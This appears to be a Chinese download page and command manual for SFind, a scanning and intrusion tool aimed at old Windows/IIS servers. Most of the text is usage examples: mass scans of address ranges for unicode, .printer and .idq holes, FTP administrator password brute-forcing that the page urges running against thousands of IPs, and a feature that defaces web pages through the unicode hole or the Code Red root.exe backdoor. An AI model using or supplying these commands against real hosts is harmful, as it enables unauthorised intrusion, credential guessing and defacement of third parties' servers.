入侵扫描工具(SFind)下载|入侵扫描工具(SFind)下载

这是入侵扫描工具(SFind)，是一款命令方式的多线程扫描工具，最大的特点是它不包含任何附属文件，体积小、扫描速度快、携带方便，扫描进度显示，仅仅只有一个EXE文件，在扫描完成后将结果保存到sfind.txt中。

软件介绍

sfind.exe是一款很优秀的扫描工具，
被部分黑客用来入侵
但其实是安全工具
临时推出SFindV1.85，增加了红色代码病毒主机的扫描，-um功能支持红色代码主机，可以直接修改其主页，提供暴力破解ftp测试，此版的暴力破解为测试用。

支持功能

端口扫描
　　CGI漏洞扫描
　　unicode漏洞扫描
　　.printer漏洞扫描
　　.idq漏洞扫描
　　FTP 匿名登陆扫描、通过FTP扫描administrator弱密码
　　codered 病毒主机扫描新功能！！！
　　利用unicode漏洞直接修改主页、利用codered病毒修改主页新功能！！！

运行实例

-p <端口开始端口结束端口> 〈IP 地址开始地址结束地址〉
　　端口扫描
　　：此方式可以扫描标准端口、自定义端口、可以对某一段地址内的指定端口扫描，如果不指定端口则扫描标准端口，目前的标准端口为10个，分别是：21、23、25、53、79、80、110、1143、3389、5631。
　　SFind -p 192.168.0.1
　　扫描192.168.0.1的标准端口
　　SFind -p 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有主机的标准端口
　　SFind -p 1 200 192.168.0.1
　　扫描192.168.0.1主机1到200的端口此方式只能一次扫描一台主机
　　SFind -p 21 192.168.0.1
　　扫描192.168.0.1主机的21端口
　　SFind -p 21 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255中所有开放21端口的主机，可以利用此功能查找开放终端服务(端口3389)的主机，也可以利用此功能快速查找中木马冰河(端口7626)的主机
　　-cgi
　　cgi漏洞扫描：目前可以检测784个CGI漏洞，此方式只能扫描一台主机
　　SFind -cgi 192.168.0.1
　　扫描192.168.0.1的CGI漏洞
　　-uni <开始地址> <结束地址>
　　unicode漏洞扫描：如果不指定结束地址则只扫描一台主机，如果找到漏洞主机可以使用-um功能进行页面修改
　　SFind -uni 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有unicode漏洞主机
　　-pri <开始地址> <结束地址>
　　.printer漏洞扫描：这是个远程溢出漏洞，具体就不介绍了，如果不指定结束地址则扫描一台主机
　　SFind -pri 192.168.0.1 192.168.0.255
　　扫描192.168.0.1 192.168.0.255范围内所有存在.printer漏洞的主机
　　-idq <开始地址> <结束地址>
　　.idq漏洞扫描：扫描.idq远程溢出漏洞，如果不指定结束地址则扫描一台主机
　　SFind -idq 192.168.0.1 192.168.0.255
　　扫描192.168.0.1到192.168.0.255范围内所有存在.idq漏洞的主机
　　-um <信息>
　　对存在unicode漏洞的主机和有codered病毒的主机进行页面修改，默认的WEB路径是c:\inetpub\wwwroot，使用此功能在对方机器的指定目录生成index.htm、index.asp、default.htm、default.asp四个文件，文件信息自己定义，大家可以在自己的机器上试试此功能
　　SFind -um 192.168.0.1 Hacker+by+Sunw
　　此命令将在192.168.0.1的c:\inetpub\wwwroot目录生成上叙四个文件，内容为:HackerbySunw
　　SFind -um 192.168.0.1 c:\inetpub\ts Hacker+by+Sunw
　　此命令在192.168.0.1的c:\inetpub\ts目录生成上叙四个文件，内容为：Hacker by Sunw
　　在使用此功能时必须要有权限对目录进行操作，如果在wwwroot目录不成功，可以换到inetpub\ts目录，这个目录可以写，信息内容不能超过50个字符，可以是英文也可以是中文(如果是中文则不能超过25个字)，在写信息时空格字符用+号代替，中间不能有"<"、">"和"="符号。如果是上传到inetpub\ts目录，则可以通过在浏览器调用http://xxx.xxx.xxx.xxx/ts/default.asp查看
　　-ftp <开始地址> <结束地址> [-admin]
　　FTP扫描：扫描允许匿名登陆的FTP服务器，如果加-admin参数则通过FTP服务器扫描administrator弱密码，如不指定结束地址则只扫描一台主机
　　SFind -ftp 192.168.0.1 192.168.0.255
　　此命令扫描192.168.0.1到192.168.0.255范围内所有允许匿名登陆的主机
　　SFind -ftp 192.168.0.1 192.168.0.255 -admin
　　此命令通过FTP服务器扫administrator弱密码，因为administrator在默认情况下是FTP服务的管理者，所以可以利用次特征扫描超级用户的口令。在绿盟xdowns56kModem上扫4000个ip地址绝不超过5分钟，所以利用此功能时请务必加大搜索力度，一次扫3000说什么也不过分
　　-codered <开始地址> <结束地址>
　　codered病毒主机扫描：扫描存在codered病毒的主机，此功能利用codered病毒会将cmd.exe复制到inetpub\ts目录下root.exe的特性进行测试，如果对方主机inetpub\ts目录存在root.exe则认为有codered病毒，可以直接通过浏览器调用root.exe，http://地址/ts/root.exe？/c，具体的操作和unicode漏洞完全相同，如果要修改主页可以直接使用SFind的um功能！
　　SFind -codered 192.168.0.1 192.168.0.255
　　此命令扫描192.168.0.1 192.168.0.255范围内所有存在红色代码病毒的主机